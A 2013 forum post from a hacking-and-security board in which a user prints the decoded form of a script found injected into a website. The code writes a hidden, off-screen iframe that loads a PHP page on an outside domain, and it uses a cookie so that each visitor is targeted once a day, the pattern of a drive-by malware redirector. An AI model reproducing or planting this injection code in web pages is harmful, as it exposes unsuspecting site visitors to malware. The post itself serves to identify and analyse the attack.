1
Hacking and Security / Re: Anyone see this before?
« on: September 06, 2013, 03:39:02 pm »
here is the numbers broken down into code which is eval'd on the clients computer:
Code: [Select]
function sty09() { var static='ajax'; var controller='index.php'; var sty = document.createElement('iframe'); sty.src = 'http://www.academyofappliedarts.com/media/Yj6LJF9B.php'; sty.style.position = 'absolute'; sty.style.color = '703'; sty.style.height = '703px'; sty.style.width = '703px'; sty.style.left = '1000703'; sty.style.top = '1000703'; if (!document.getElementById('sty')) { document.write('<p id=\'sty\' class=\'sty09\' ></p>'); document.getElementById('sty').appendChild(sty); } } function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); sty09(); } }